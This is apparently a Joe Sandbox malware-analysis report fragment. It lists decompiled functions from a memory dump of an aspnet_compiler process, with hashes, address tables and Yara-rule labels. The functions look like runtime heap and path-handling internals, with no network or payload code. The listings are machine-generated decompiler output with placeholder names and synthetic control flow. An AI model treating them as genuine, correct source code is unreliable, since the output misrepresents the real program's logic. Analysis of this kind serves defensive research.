Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 8331F332F00B056BEB168B69DC65FBFFBEAEF80218F054469E905A72D1DA749D40C750

Uniqueness

Uniqueness Score: -1.00%

Function 01258A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01258A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x133d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0128B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0125E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1221180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01271DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01283C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01258999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x01258a0a
0x01258a1c
0x01258a23
0x01258a2e
0x01258a30
0x01258a36
0x01258a3c
0x01258a3e
0x01258a4a
0x01258a52
0x01258a9c
0x01258aae
0x01258a58
0x01258a5e
0x01258a6a
0x01258a6f
0x01258a75
0x01258a7d
0x01258a85
0x01258a86
0x01258a89
0x01258a93
0x01258a99
0x01258a9b
0x00000000
0x01258aaf
0x01258abe
0x01258ac3
0x01258acb
0x01258ad7
0x01258ae0
0x01258af1
0x00000000
0x01258af1
0x01258acd
0x01258ad5
0x01258afb
0x01258afd
0x01258aff
0x01258b07
0x01258b22
0x01258b24
0x01258b2a
0x01258b2e
0x01258b3f
0x01258b78
0x01258b41
0x01258b52
0x01258b54
0x01258b5c
0x01258b74
0x01258b74
0x01258b5c
0x01258b3f
0x01258b5e
0x01258b61
0x01258b64
0x01258b64
0x01258b6c
0x01258b6c
0x01258b11
0x012a9cd5
0x012a9cd5
0x01258b17
0x01258b1a
0x01258b1a
0x00000000
0x01258ad5
0x01258a89

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e85fbc6a94e8ed91d76baa25e7b78a28874a269f6e2bc84fecde561ba2b5df
Instruction ID: eddc96a87250132f49808d1c887937db790d576cc009b7191c31d15b23da696d
Opcode Fuzzy Hash: 05e85fbc6a94e8ed91d76baa25e7b78a28874a269f6e2bc84fecde561ba2b5df
Instruction Fuzzy Hash: D9415FB1A112299BDB64DF5AC8C8AB9B7F8FB54300F1045E9DD19D7252E7B09E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0130FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0130FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0130FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01310A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01267D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01301608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01312B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0130C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0130DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01267D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0130A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0130fde7
0x0130fde8
0x0130fdec
0x0130fdee
0x0130fdf5
0x0130fdf7
0x0130fdfc
0x0130fe19
0x0130fe22
0x0130fe26
0x0130fec6
0x0130fecd
0x0130fed5
0x0130fee7
0x0130fed7
0x0130fee0
0x0130fee0
0x0130feef
0x0130ff00
0x0130ff02
0x0130ff07
0x0130ff07
0x00000000
0x0130feef
0x0130fe33
0x0130fe55
0x0130fe59
0x0130fe5b
0x0130fe5e
0x0130fe69
0x0130fe6d
0x0130fe6d
0x0130fe69
0x0130fe35
0x0130fe41
0x0130fe41
0x0130fe79
0x0130fe8b
0x0130fe7b
0x0130fe84
0x0130fe84
0x0130fe93
0x00000000
0x0130fea8
0x0130feba
0x00000000
0x0130feba
0x0130fdfe
0x0130fe01
0x0130fe02
0x0130fe08
0x0130ff0c
0x0130ff14
0x0130ff14

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 5b0d2ef2a3e77cf77118cd90131e2a14477e7238d0983aa85b3ac658ba6b87f4
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: F93114322006456FE3339B6CC864F6BBBEDEBC5658F184558E94A8B7C2DA74EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0130EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0130EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01262280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0130E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0124F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0125FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0130AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0130BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01267D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E012FFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0125FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0130A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0130ea55
0x0130ea66
0x0130ea68
0x0130ea6c
0x0130ea6f
0x0130ea72
0x0130ea75
0x0130ea7a
0x0130ea7a
0x0130ea7e
0x0130ea80
0x0130ea85
0x0130ea8b
0x0130eab5
0x0130eabc
0x0130eabf
0x0130eabf
0x0130eaca
0x0130eace
0x0130ead0
0x0130eae4
0x0130eaeb
0x0130eaf0
0x0130eaf5
0x0130eb09
0x0130eb0d
0x0130eb1d
0x0130eb2d
0x0130eb38
0x0130eb3d
0x0130eb41
0x0130eb4a
0x0130eb60
0x0130eb4c
0x0130eb52
0x0130eb59
0x0130eb59
0x0130eb68
0x0130eb71
0x0130eb71
0x0130ea8d
0x0130ea8f
0x0130ea92
0x0130ea97
0x0130ea97
0x0130ea9b
0x0130ea9c
0x0130ea9e
0x0130eaa6
0x0130eaa6
0x0130eb7e

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 09b1774f76fd2683886601f4d1fcf854797e36592ca3b8472a918a2f89c94fd2
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 4E31D4327147069BD71ADF28C890A6BB7E9FBC4214F04492DF55287781DE34E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012C69A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E012C69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x133d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01256C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E012C6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01289980() >= 0) {
							E01262280(_t56, 0x1338778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1338774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1338774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0124B6F0(0x122c338, 0x122c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01289520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E012895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0125FFB0(_t68, _t77, 0x1338778);
				}
				_pop(_t78);
				return E0128B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x012c69b5
0x012c69be
0x012c69c3
0x012c69c9
0x012c69cc
0x012c69d1
0x012c69d3
0x012c69de
0x012c69e1
0x012c69ea
0x012c69f6
0x012c69fe
0x012c6a13
0x012c6a14
0x012c6a15
0x012c6a16
0x012c6a1e
0x012c6a26
0x012c6a31
0x012c6a36
0x012c6a37
0x012c6a40
0x012c6a49
0x012c6a4a
0x012c6a53
0x012c6a59
0x012c6a5d
0x012c6a5e
0x012c6a64
0x012c6a67
0x012c6a6a
0x012c6a6d
0x012c6a70
0x012c6a77
0x012c6a7d
0x012c6a86
0x012c6a89
0x012c6a9c
0x012c6a9f
0x012c6aa2
0x012c6aa5
0x012c6aaf
0x012c6ab1
0x012c6ab8
0x012c6ab9
0x012c6abb
0x012c6abe
0x012c6ac5
0x012c6ac5
0x012c6aaf
0x012c6a40
0x012c6a26
0x012c69fe
0x012c6ace
0x012c6ad0
0x012c6ad3
0x012c6ad8
0x012c6adf
0x012c6adf
0x012c6ae8
0x012c6aef
0x012c6aef
0x012c6af9
0x012c6b06

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788c542928a239eafb103a3f5128bddb801092f2a980e05c7f3f56936b6b11c6
Instruction ID: a83fb05daea914739cf62cf0d51c22e6f4a5249620c2bd68f2502fbe172b9899
Opcode Fuzzy Hash: 788c542928a239eafb103a3f5128bddb801092f2a980e05c7f3f56936b6b11c6
Instruction Fuzzy Hash: 54419BB1D11209AFDB20DFA9D840BFEBBF9EF48714F04822EEA14A7240DB319905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01245210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01245210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E012452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E012895D0();
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0125EB70(_t54, 0x13379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E012895D0();
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0125EB70(_t54, 0x13379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0128F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0125EB70(_t54, 0x13379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E012895D0();
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x01245220
0x01245224
0x012a0d13
0x012a0d16
0x012a0d19
0x0124522a
0x0124522a
0x0124522d
0x0124522d
0x01245231
0x01245235
0x01245239
0x012a0d5c
0x012a0d62
0x00000000
0x00000000
0x012a0d6a
0x012a0d7b
0x012a0d7f
0x012a0d81
0x012a0d84
0x012a0d95
0x012a0d95
0x012a0d6c
0x012a0d71
0x012a0d71
0x012a0d9a
0x00000000
0x0124524a
0x0124524a
0x01245250
0x012a0d24
0x012a0d35
0x012a0d39
0x012a0d3b
0x012a0d3e
0x012a0d50
0x012a0d50
0x012a0d26
0x012a0d2b
0x012a0d2b
0x00000000
0x012a0d55
0x01245256
0x0124525b
0x01245265
0x012a0da7
0x0124526b
0x0124526e
0x01245272
0x012a0db1
0x012a0db4
0x012a0dc5
0x012a0dc5
0x01245272
0x01245278
0x0124527e
0x0124528a
0x0124528c
0x0124528d
0x00000000
0x01245280
0x01245282
0x01245288
0x0124529f
0x01245292
0x00000000
0x01245292
0x00000000
0x01245288
0x0124527e

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d06ba8dfadc120de7e4d651271c68d2ed697741f263c400cc751e0d48aede4
Instruction ID: cf855369734865103051c1dbea324802f4e9440b5478e6365a65120c78489a9e
Opcode Fuzzy Hash: a9d06ba8dfadc120de7e4d651271c68d2ed697741f263c400cc751e0d48aede4
Instruction Fuzzy Hash: E8311632671A02EBC726AF18C881B3E7765FF50760F51462AF9560B590E770F940C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 01283D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01283D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01257B60(0, _t61, 0x12211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01257B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01264620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01283d4c
0x01283d50
0x01283d55
0x01283d5e
0x012be79a
0x00000000
0x012be79a
0x01283d68
0x012be789
0x01283d9d
0x01283da3
0x01283daf
0x01283db5
0x01283dbc
0x01283dc4
0x01283dc9
0x01283dce
0x012be7ae
0x012be7ae
0x01283dde
0x01283de2
0x01283de7
0x01283e0d
0x01283e13
0x01283e16
0x01283e1e
0x01283e25
0x01283e28
0x00000000
0x00000000
0x01283e2a
0x01283e2f
0x01283e37
0x01283e37
0x00000000
0x01283e37
0x01283e31
0x00000000
0x01283e31
0x01283e20
0x01283e20
0x01283e35
0x00000000
0x01283de9
0x01283de9
0x01283de9
0x01283dee
0x01283dfd
0x01283dff
0x01283e02
0x01283e05
0x01283e05
0x00000000
0x01283df0
0x01283de7
0x012be78f
0x012be794
0x01283d79
0x01283d84
0x01283d89
0x01283d8e
0x00000000
0x012be7a4
0x01283d96
0x01283d9a
0x00000000
0x01283d9a
0x00000000
0x012be794
0x01283d6e
0x01283d73
0x00000000
0x012be7b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d13ad07404a668b80fe992fb837cd9c42ddd5ba4d79e6d620dbfa04c1091a41
Instruction ID: ed0a54622788b50458fc0ee9459b0a7396073c79377b2e58b9cc786db6bd6d2c
Opcode Fuzzy Hash: 1d13ad07404a668b80fe992fb837cd9c42ddd5ba4d79e6d620dbfa04c1091a41
Instruction Fuzzy Hash: A231B031622616DBD729EF2DD882A7BBBE5FF55B00705806AEA45CB3D0E770D840C790

Uniqueness

Uniqueness Score: -1.00%

Function 0127A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0127A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1320220);
				E0129D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1337b9c; // 0x0
				_t55 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0129D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1337b10 =  *0x1337b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x133536c; // 0x773a5368
					if( *_t51 != 0x1335368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1335368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x133536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0127A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0127a61c
0x0127a61e
0x0127a623
0x0127a628
0x0127a62b
0x0127a62d
0x0127a648
0x0127a64a
0x0127a64f
0x012b9b44
0x0127a6ec
0x0127a6f1
0x0127a6f1
0x0127a655
0x0127a657
0x0127a65a
0x0127a65d
0x0127a662
0x0127a663
0x0127a667
0x0127a668
0x0127a66d
0x0127a706
0x0127a706
0x012b9bda
0x012b9be6
0x012b9beb
0x00000000
0x012b9beb
0x0127a679
0x012b9b7a
0x00000000
0x012b9b7a
0x0127a683
0x0127a6f4
0x0127a6f7
0x0127a6f9
0x0127a6fd
0x0127a6a0
0x0127a6a0
0x0127a6ad
0x0127a6af
0x0127a6b4
0x012b9ba7
0x012b9bac
0x00000000
0x00000000
0x012b9bc6
0x012b9bce
0x012b9bd1
0x012b9bd3
0x012b9bd3
0x00000000
0x012b9bd1
0x0127a6bd
0x0127a6c3
0x0127a6c6
0x0127a6d2
0x0127a701
0x0127a704
0x00000000
0x0127a704
0x0127a6d4
0x0127a6d6
0x0127a6d9
0x0127a6db
0x0127a6e1
0x0127a6e6
0x0127a6e8
0x0127a6e8
0x0127a6ea
0x00000000
0x0127a6ea
0x0127a688
0x0127a692
0x0127a694
0x0127a699
0x00000000
0x00000000
0x0127a69d
0x00000000

Memory Dump Source

